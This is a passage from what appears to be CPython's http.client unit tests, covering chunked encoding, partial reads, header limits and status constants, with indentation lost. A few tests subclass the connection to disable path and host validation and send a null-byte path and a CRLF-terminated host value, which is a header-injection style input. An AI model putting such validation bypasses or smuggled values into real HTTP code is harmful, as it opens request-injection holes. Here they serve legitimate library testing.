b'Second: val1\r\n'
b'Second: val2\r\n'
)
sock = FakeSocket(body)
resp = client.HTTPResponse(sock, debuglevel=1)
with support.captured_stdout() as output:
resp.begin()
lines = output.getvalue().splitlines()
self.assertEqual(lines[0], "reply: 'HTTP/1.1 200 OK\\r\\n'")
self.assertEqual(lines[1], "header: First: val")
self.assertEqual(lines[2], "header: Second: val1")
self.assertEqual(lines[3], "header: Second: val2")
class TransferEncodingTest(TestCase):
expected_body = b"It's just a flesh wound"
def test_endheaders_chunked(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.putrequest('POST', '/')
conn.endheaders(self._make_body(), encode_chunked=True)
_, _, body = self._parse_request(conn.sock.data)
body = self._parse_chunked(body)
self.assertEqual(body, self.expected_body)
def test_explicit_headers(self):
# explicit chunked
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
# this shouldn't actually be automatically chunk-encoded because the
# calling code has explicitly stated that it's taking care of it
conn.request(
'POST', '/', self._make_body(), {'Transfer-Encoding': 'chunked'})
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers.keys()])
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertEqual(body, self.expected_body)
# explicit chunked, string body
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request(
'POST', '/', self.expected_body.decode('latin-1'),
{'Transfer-Encoding': 'chunked'})
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers.keys()])
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertEqual(body, self.expected_body)
# User-specified TE, but request() does the chunk encoding
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request('POST', '/',
headers={'Transfer-Encoding': 'gzip, chunked'},
encode_chunked=True,
body=self._make_body())
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers])
self.assertEqual(headers['Transfer-Encoding'], 'gzip, chunked')
self.assertEqual(self._parse_chunked(body), self.expected_body)
def test_request(self):
for empty_lines in (False, True,):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request(
'POST', '/', self._make_body(empty_lines=empty_lines))
_, headers, body = self._parse_request(conn.sock.data)
body = self._parse_chunked(body)
self.assertEqual(body, self.expected_body)
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
# Content-Length and Transfer-Encoding SHOULD not be sent in the
# same request
self.assertNotIn('content-length', [k.lower() for k in headers])
def test_empty_body(self):
# Zero-length iterable should be treated like any other iterable
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request('POST', '/', ())
_, headers, body = self._parse_request(conn.sock.data)
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertNotIn('content-length', [k.lower() for k in headers])
self.assertEqual(body, b"0\r\n\r\n")
def _make_body(self, empty_lines=False):
lines = self.expected_body.split(b' ')
for idx, line in enumerate(lines):
# for testing handling empty lines
if empty_lines and idx % 2:
yield b''
if idx < len(lines) - 1:
yield line + b' '
else:
yield line
def _parse_request(self, data):
lines = data.split(b'\r\n')
request = lines[0]
headers = {}
n = 1
while n < len(lines) and len(lines[n]) > 0:
key, val = lines[n].split(b':')
key = key.decode('latin-1').strip()
headers[key] = val.decode('latin-1').strip()
n += 1
return request, headers, b'\r\n'.join(lines[n + 1:])
def _parse_chunked(self, data):
body = []
trailers = {}
n = 0
lines = data.split(b'\r\n')
# parse body
while True:
size, chunk = lines[n:n+2]
size = int(size, 16)
if size == 0:
n += 1
break
self.assertEqual(size, len(chunk))
body.append(chunk)
n += 2
# we /should/ hit the end chunk, but check against the size of
# lines so we're not stuck in an infinite loop should we get
# malformed data
if n > len(lines):
break
return b''.join(body)
class BasicTest(TestCase):
def test_status_lines(self):
# Test HTTP status lines
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(0), b'') # Issue #20007
self.assertFalse(resp.isclosed())
self.assertFalse(resp.closed)
self.assertEqual(resp.read(), b"Text")
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
body = "HTTP/1.1 400.100 Not Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
self.assertRaises(client.BadStatusLine, resp.begin)
def test_bad_status_repr(self):
exc = client.BadStatusLine('')
self.assertEqual(repr(exc), '''BadStatusLine("''")''')
def test_partial_reads(self):
# if we have Content-Length, HTTPResponse knows when to close itself,
# the same behaviour as when we read the whole thing with read()
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_mixed_reads(self):
# readline() should update the remaining length, so that read() knows
# how much data is left and does not raise IncompleteRead
body = "HTTP/1.1 200 Ok\r\nContent-Length: 13\r\n\r\nText\r\nAnother"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.readline(), b'Text\r\n')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(), b'Another')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_readintos(self):
# if we have Content-Length, HTTPResponse knows when to close itself,
# the same behaviour as when we read the whole thing with read()
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_reads_no_content_length(self):
# when no length is present, the socket should be gracefully closed when
# all data was read
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertEqual(resp.read(1), b'')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_readintos_no_content_length(self):
# when no length is present, the socket should be gracefully closed when
# all data was read
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertTrue(resp.isclosed())
def test_partial_reads_incomplete_body(self):
# if the server shuts down the connection before the whole
# content-length is delivered, the socket is gracefully closed
body = "HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertEqual(resp.read(1), b'')
self.assertTrue(resp.isclosed())
def test_partial_readintos_incomplete_body(self):
# if the server shuts down the connection before the whole
# content-length is delivered, the socket is gracefully closed
body = "HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_host_port(self):
# Check invalid host_port
for hp in ("www.python.org:abc", "user:password@www.python.org"):
self.assertRaises(client.InvalidURL, client.HTTPConnection, hp)
for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000",
"fe80::207:e9ff:fe9b", 8000),
("www.python.org:80", "www.python.org", 80),
("www.python.org:", "www.python.org", 80),
("www.python.org", "www.python.org", 80),
("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 80),
("[fe80::207:e9ff:fe9b]:", "fe80::207:e9ff:fe9b", 80)):
c = client.HTTPConnection(hp)
self.assertEqual(h, c.host)
self.assertEqual(p, c.port)
def test_response_headers(self):
# test response with multiple message headers with the same field name.
text = ('HTTP/1.1 200 OK\r\n'
'Set-Cookie: Customer="WILE_E_COYOTE"; '
'Version="1"; Path="/acme"\r\n'
'Set-Cookie: Part_Number="Rocket_Launcher_0001"; Version="1";'
' Path="/acme"\r\n'
'\r\n'
'No body\r\n')
hdr = ('Customer="WILE_E_COYOTE"; Version="1"; Path="/acme"'
', '
'Part_Number="Rocket_Launcher_0001"; Version="1"; Path="/acme"')
s = FakeSocket(text)
r = client.HTTPResponse(s)
r.begin()
cookies = r.getheader("Set-Cookie")
self.assertEqual(cookies, hdr)
def test_read_head(self):
# Test that the library doesn't attempt to read any data
# from a HEAD request. (Tickles SF bug #622042.)
sock = FakeSocket(
'HTTP/1.1 200 OK\r\n'
'Content-Length: 14432\r\n'
'\r\n',
NoEOFBytesIO)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
if resp.read():
self.fail("Did not expect response from HEAD request")
def test_readinto_head(self):
# Test that the library doesn't attempt to read any data
# from a HEAD request. (Tickles SF bug #622042.)
sock = FakeSocket(
'HTTP/1.1 200 OK\r\n'
'Content-Length: 14432\r\n'
'\r\n',
NoEOFBytesIO)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
b = bytearray(5)
if resp.readinto(b) != 0:
self.fail("Did not expect response from HEAD request")
self.assertEqual(bytes(b), b'\x00'*5)
def test_too_many_headers(self):
headers = '\r\n'.join('Header%d: foo' % i
for i in range(client._MAXHEADERS + 1)) + '\r\n'
text = ('HTTP/1.1 200 OK\r\n' + headers)
s = FakeSocket(text)
r = client.HTTPResponse(s)
self.assertRaisesRegex(client.HTTPException,
r"got more than \d+ headers", r.begin)
def test_send_file(self):
expected = (b'GET /foo HTTP/1.1\r\nHost: example.com\r\n'
b'Accept-Encoding: identity\r\n'
b'Transfer-Encoding: chunked\r\n'
b'\r\n')
with open(__file__, 'rb') as body:
conn = client.HTTPConnection('example.com')
sock = FakeSocket(body)
conn.sock = sock
conn.request('GET', '/foo', body)
self.assertTrue(sock.data.startswith(expected), '%r != %r' %
(sock.data[:len(expected)], expected))
def test_send(self):
expected = b'this is a test this is only a test'
conn = client.HTTPConnection('example.com')
sock = FakeSocket(None)
conn.sock = sock
conn.send(expected)
self.assertEqual(expected, sock.data)
sock.data = b''
conn.send(array.array('b', expected))
self.assertEqual(expected, sock.data)
sock.data = b''
conn.send(io.BytesIO(expected))
self.assertEqual(expected, sock.data)
def test_send_updating_file(self):
def data():
yield 'data'
yield None
yield 'data_two'
class UpdatingFile(io.TextIOBase):
mode = 'r'
d = data()
def read(self, blocksize=-1):
return next(self.d)
expected = b'data'
conn = client.HTTPConnection('example.com')
sock = FakeSocket("")
conn.sock = sock
conn.send(UpdatingFile())
self.assertEqual(sock.data, expected)
def test_send_iter(self):
expected = b'GET /foo HTTP/1.1\r\nHost: example.com\r\n' \
b'Accept-Encoding: identity\r\nContent-Length: 11\r\n' \
b'\r\nonetwothree'
def body():
yield b"one"
yield b"two"
yield b"three"
conn = client.HTTPConnection('example.com')
sock = FakeSocket("")
conn.sock = sock
conn.request('GET', '/foo', body(), {'Content-Length': '11'})
self.assertEqual(sock.data, expected)
def test_blocksize_request(self):
"""Check that request() respects the configured block size."""
blocksize = 8 # For easy debugging.
conn = client.HTTPConnection('example.com', blocksize=blocksize)
sock = FakeSocket(None)
conn.sock = sock
expected = b"a" * blocksize + b"b"
conn.request("PUT", "/", io.BytesIO(expected), {"Content-Length": "9"})
self.assertEqual(sock.sendall_calls, 3)
body = sock.data.split(b"\r\n\r\n", 1)[1]
self.assertEqual(body, expected)
def test_blocksize_send(self):
"""Check that send() respects the configured block size."""
blocksize = 8 # For easy debugging.
conn = client.HTTPConnection('example.com', blocksize=blocksize)
sock = FakeSocket(None)
conn.sock = sock
expected = b"a" * blocksize + b"b"
conn.send(io.BytesIO(expected))
self.assertEqual(sock.sendall_calls, 2)
self.assertEqual(sock.data, expected)
def test_send_type_error(self):
# See: Issue #12676
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('')
with self.assertRaises(TypeError):
conn.request('POST', 'test', conn)
def test_chunked(self):
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
# Various read sizes
for n in range(1, 12):
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(n) + resp.read(n) + resp.read(), expected)
resp.close()
for x in ('', 'foo\r\n'):
sock = FakeSocket(chunked_start + x)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
resp.read()
except client.IncompleteRead as i:
self.assertEqual(i.partial, expected)
expected_message = 'IncompleteRead(%d bytes read)' % len(expected)
self.assertEqual(repr(i), expected_message)
self.assertEqual(str(i), expected_message)
else:
self.fail('IncompleteRead expected')
finally:
resp.close()
def test_readinto_chunked(self):
expected = chunked_expected
nexpected = len(expected)
b = bytearray(128)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
n = resp.readinto(b)
self.assertEqual(b[:nexpected], expected)
self.assertEqual(n, nexpected)
resp.close()
# Various read sizes
for n in range(1, 12):
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
m = memoryview(b)
i = resp.readinto(m[0:n])
i += resp.readinto(m[i:n + i])
i += resp.readinto(m[i:])
self.assertEqual(b[:nexpected], expected)
self.assertEqual(i, nexpected)
resp.close()
for x in ('', 'foo\r\n'):
sock = FakeSocket(chunked_start + x)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
n = resp.readinto(b)
except client.IncompleteRead as i:
self.assertEqual(i.partial, expected)
expected_message = 'IncompleteRead(%d bytes read)' % len(expected)
self.assertEqual(repr(i), expected_message)
self.assertEqual(str(i), expected_message)
else:
self.fail('IncompleteRead expected')
finally:
resp.close()
def test_chunked_head(self):
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello world\r\n'
'1\r\n'
'd\r\n'
)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
self.assertEqual(resp.read(), b'')
self.assertEqual(resp.status, 200)
self.assertEqual(resp.reason, 'OK')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_readinto_chunked_head(self):
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello world\r\n'
'1\r\n'
'd\r\n'
)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
b = bytearray(5)
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertEqual(bytes(b), b'\x00'*5)
self.assertEqual(resp.status, 200)
self.assertEqual(resp.reason, 'OK')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_negative_content_length(self):
sock = FakeSocket(
'HTTP/1.1 200 OK\r\nContent-Length: -1\r\n\r\nHello\r\n')
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), b'Hello\r\n')
self.assertTrue(resp.isclosed())
def test_incomplete_read(self):
sock = FakeSocket('HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nHello\r\n')
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
resp.read()
except client.IncompleteRead as i:
self.assertEqual(i.partial, b'Hello\r\n')
self.assertEqual(repr(i),
"IncompleteRead(7 bytes read, 3 more expected)")
self.assertEqual(str(i),
"IncompleteRead(7 bytes read, 3 more expected)")
self.assertTrue(resp.isclosed())
else:
self.fail('IncompleteRead expected')
def test_epipe(self):
sock = EPipeSocket(
"HTTP/1.0 401 Authorization Required\r\n"
"Content-type: text/html\r\n"
"WWW-Authenticate: Basic realm=\"example\"\r\n",
b"Content-Length")
conn = client.HTTPConnection("example.com")
conn.sock = sock
self.assertRaises(OSError,
lambda: conn.request("PUT", "/url", "body"))
resp = conn.getresponse()
self.assertEqual(401, resp.status)
self.assertEqual("Basic realm=\"example\"",
resp.getheader("www-authenticate"))
# Test lines overflowing the max line size (_MAXLINE in http.client)
def test_overflowing_status_line(self):
body = "HTTP/1.1 200 Ok" + "k" * 65536 + "\r\n"
resp = client.HTTPResponse(FakeSocket(body))
self.assertRaises((client.LineTooLong, client.BadStatusLine), resp.begin)
def test_overflowing_header_line(self):
body = (
'HTTP/1.1 200 OK\r\n'
'X-Foo: bar' + 'r' * 65536 + '\r\n\r\n'
)
resp = client.HTTPResponse(FakeSocket(body))
self.assertRaises(client.LineTooLong, resp.begin)
def test_overflowing_chunked_line(self):
body = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
+ '0' * 65536 + 'a\r\n'
'hello world\r\n'
'0\r\n'
'\r\n'
)
resp = client.HTTPResponse(FakeSocket(body))
resp.begin()
self.assertRaises(client.LineTooLong, resp.read)
def test_early_eof(self):
# Test httpresponse with no \r\n termination,
body = "HTTP/1.1 200 Ok"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(), b'')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_error_leak(self):
# Test that the socket is not leaked if getresponse() fails
conn = client.HTTPConnection('example.com')
response = None
class Response(client.HTTPResponse):
def __init__(self, *pos, **kw):
nonlocal response
response = self # Avoid garbage collector closing the socket
client.HTTPResponse.__init__(self, *pos, **kw)
conn.response_class = Response
conn.sock = FakeSocket('Invalid status line')
conn.request('GET', '/')
self.assertRaises(client.BadStatusLine, conn.getresponse)
self.assertTrue(response.closed)
self.assertTrue(conn.sock.file_closed)
def test_chunked_extension(self):
extra = '3;foo=bar\r\n' + 'abc\r\n'
expected = chunked_expected + b'abc'
sock = FakeSocket(chunked_start + extra + last_chunk_extended + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
def test_chunked_missing_end(self):
"""some servers may serve up a short chunked encoding stream"""
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk) #no terminating crlf
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
def test_chunked_trailers(self):
"""See that trailers are read and ignored"""
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk + trailers + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# we should have reached the end of the file
self.assertEqual(sock.file.read(), b"") #we read to the end
resp.close()
def test_chunked_sync(self):
"""Check that we don't read past the end of the chunked-encoding stream"""
expected = chunked_expected
extradata = "extradata"
sock = FakeSocket(chunked_start + last_chunk + trailers + chunked_end + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata.encode("ascii")) #we read to the end
resp.close()
def test_content_length_sync(self):
"""Check that we don't read past the end of the Content-Length stream"""
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_readlines_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.readlines(2000), [expected])
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_read1_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read1(2000), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_readline_bound_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.readline(10), expected)
self.assertEqual(resp.readline(10), b"")
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_read1_bound_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 30\r\n\r\n' + expected*3 + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read1(20), expected*2)
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_response_fileno(self):
# Make sure fd returned by fileno is valid.
serv = socket.create_server((HOST, 0))
self.addCleanup(serv.close)
result = None
def run_server():
[conn, address] = serv.accept()
with conn, conn.makefile("rb") as reader:
# Read the request header until a blank line
while True:
line = reader.readline()
if not line.rstrip(b"\r\n"):
break
conn.sendall(b"HTTP/1.1 200 Connection established\r\n\r\n")
nonlocal result
result = reader.read()
thread = threading.Thread(target=run_server)
thread.start()
self.addCleanup(thread.join, float(1))
conn = client.HTTPConnection(*serv.getsockname())
conn.request("CONNECT", "dummy:1234")
response = conn.getresponse()
try:
self.assertEqual(response.status, client.OK)
s = socket.socket(fileno=response.fileno())
try:
s.sendall(b"proxied data\n")
finally:
s.detach()
finally:
response.close()
conn.close()
thread.join()
self.assertEqual(result, b"proxied data\n")
def test_putrequest_override_domain_validation(self):
"""
It should be possible to override the default validation
behavior in putrequest (bpo-38216).
"""
class UnsafeHTTPConnection(client.HTTPConnection):
def _validate_path(self, url):
pass
conn = UnsafeHTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/\x00')
def test_putrequest_override_host_validation(self):
class UnsafeHTTPConnection(client.HTTPConnection):
def _validate_host(self, url):
pass
conn = UnsafeHTTPConnection('example.com\r\n')
conn.sock = FakeSocket('')
# set skip_host so a ValueError is not raised upon adding the
# invalid URL as the value of the "Host:" header
conn.putrequest('GET', '/', skip_host=1)
def test_putrequest_override_encoding(self):
"""
It should be possible to override the default encoding
to transmit bytes in another encoding even if invalid
(bpo-36274).
"""
class UnsafeHTTPConnection(client.HTTPConnection):
def _encode_request(self, str_url):
return str_url.encode('utf-8')
conn = UnsafeHTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/☃')
class ExtendedReadTest(TestCase):
"""
Test peek(), read1(), readline()
"""
lines = (
'HTTP/1.1 200 OK\r\n'
'\r\n'
'hello world!\n'
'and now \n'
'for something completely different\n'
'foo'
)
lines_expected = lines[lines.find('hello'):].encode("ascii")
lines_chunked = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd!\n\r\n'
'9\r\n'
'and now \n\r\n'
'23\r\n'
'for something completely different\n\r\n'
'3\r\n'
'foo\r\n'
'0\r\n' # terminating chunk
'\r\n' # end of trailers
)
def setUp(self):
sock = FakeSocket(self.lines)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
resp.fp = io.BufferedReader(resp.fp)
self.resp = resp
def test_peek(self):
resp = self.resp
# patch up the buffered peek so that it returns not too much stuff
oldpeek = resp.fp.peek
def mypeek(n=-1):
p = oldpeek(n)
if n >= 0:
return p[:n]
return p[:10]
resp.fp.peek = mypeek
all = []
while True:
# try a short peek
p = resp.peek(3)
if p:
self.assertGreater(len(p), 0)
# then unbounded peek
p2 = resp.peek()
self.assertGreaterEqual(len(p2), len(p))
self.assertTrue(p2.startswith(p))
next = resp.read(len(p2))
self.assertEqual(next, p2)
else:
next = resp.read()
self.assertFalse(next)
all.append(next)
if not next:
break
self.assertEqual(b"".join(all), self.lines_expected)
def test_readline(self):
resp = self.resp
self._verify_readline(self.resp.readline, self.lines_expected)
def _verify_readline(self, readline, expected):
all = []
while True:
# short readlines
line = readline(5)
if line and line != b"foo":
if len(line) < 5:
self.assertTrue(line.endswith(b"\n"))
all.append(line)
if not line:
break
self.assertEqual(b"".join(all), expected)
def test_read1(self):
resp = self.resp
def r():
res = resp.read1(4)
self.assertLessEqual(len(res), 4)
return res
readliner = Readliner(r)
self._verify_readline(readliner.readline, self.lines_expected)
def test_read1_unbounded(self):
resp = self.resp
all = []
while True:
data = resp.read1()
if not data:
break
all.append(data)
self.assertEqual(b"".join(all), self.lines_expected)
def test_read1_bounded(self):
resp = self.resp
all = []
while True:
data = resp.read1(10)
if not data:
break
self.assertLessEqual(len(data), 10)
all.append(data)
self.assertEqual(b"".join(all), self.lines_expected)
def test_read1_0(self):
self.assertEqual(self.resp.read1(0), b"")
def test_peek_0(self):
p = self.resp.peek(0)
self.assertLessEqual(0, len(p))
class ExtendedReadTestChunked(ExtendedReadTest):
"""
Test peek(), read1(), readline() in chunked mode
"""
lines = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd!\n\r\n'
'9\r\n'
'and now \n\r\n'
'23\r\n'
'for something completely different\n\r\n'
'3\r\n'
'foo\r\n'
'0\r\n' # terminating chunk
'\r\n' # end of trailers
)
class Readliner:
"""
a simple readline class that uses an arbitrary read function and buffering
"""
def __init__(self, readfunc):
self.readfunc = readfunc
self.remainder = b""
def readline(self, limit):
data = []
datalen = 0
read = self.remainder
try:
while True:
idx = read.find(b'\n')
if idx != -1:
break
if datalen + len(read) >= limit:
idx = limit - datalen - 1
# read more data
data.append(read)
read = self.readfunc()
if not read:
idx = 0 #eof condition
break
idx += 1
data.append(read[:idx])
self.remainder = read[idx:]
return b"".join(data)
except:
self.remainder = b"".join(data)
raise
class OfflineTest(TestCase):
def test_all(self):
# Documented objects defined in the module should be in __all__
expected = {"responses"} # White-list documented dict() object
# HTTPMessage, parse_headers(), and the HTTP status code constants are
# intentionally omitted for simplicity
blacklist = {"HTTPMessage", "parse_headers"}
for name in dir(client):
if name.startswith("_") or name in blacklist:
continue
module_object = getattr(client, name)
if getattr(module_object, "__module__", None) == "http.client":
expected.add(name)
self.assertCountEqual(client.__all__, expected)
def test_responses(self):
self.assertEqual(client.responses[client.NOT_FOUND], "Not Found")
def test_client_constants(self):
# Make sure we don't break backward compatibility with 3.4
expected = [
'CONTINUE',
'SWITCHING_PROTOCOLS',
'PROCESSING',
'OK',
'CREATED',
'ACCEPTED',
'NON_AUTHORITATIVE_INFORMATION',
'NO_CONTENT',
'RESET_CONTENT',
'PARTIAL_CONTENT',
'MULTI_STATUS',
'IM_USED',
'MULTIPLE_CHOICES',
'MOVED_PERMANENTLY',
'FOUND',
'SEE_OTHER',
'NOT_MODIFIED',
'USE_PROXY',
'TEMPORARY_REDIRECT',
'BAD_REQUEST',
'UNAUTHORIZED',
'PAYMENT_REQUIRED',
'FORBIDDEN',
'NOT_FOUND',
'METHOD_NOT_ALLOWED',
'NOT_ACCEPTABLE',
'PROXY_AUTHENTICATION_REQUIRED',
'REQUEST_TIMEOUT',
'CONFLICT',
'GONE',
'LENGTH_REQUIRED',
'PRECONDITION_FAILED',
'REQUEST_ENTITY_TOO_LARGE',
'REQUEST_URI_TOO_LONG',
'UNSUPPORTED_MEDIA_TYPE',
'REQUESTED_RANGE_NOT_SATISFIABLE',
'EXPECTATION_FAILED',
'IM_A_TEAPOT',
'MISDIRECTED_REQUEST',
'UNPROCESSABLE_ENTITY',
'LOCKED',
'FAILED_DEPENDENCY',
'UPGRADE_REQUIRED',
'PRECONDITION_REQUIRED',
'TOO_MANY_REQUESTS',
'REQUEST_HEADER_FIELDS_TOO_LARGE',
'UNAVAILABLE_FOR_LEGAL_REASONS',
'INTERNAL_SERVER_ERROR',
'NOT_IMPLEMENTED',
'BAD_GATEWAY',
'SERVICE_UNAVAILABLE',
'GATEWAY_TIMEOUT',
'HTTP_VERSION_NOT_SUPPORTED',
'INSUFFICIENT_STORAGE',
'NOT_EXTENDED',
'NETWORK_AUTHENTICATION_REQUIRED',
'EARLY_HINTS',
'TOO_EARLY'
]
for const in expected:
with self.subTest(constant=const):
self.assertTrue(hasattr(client, const))
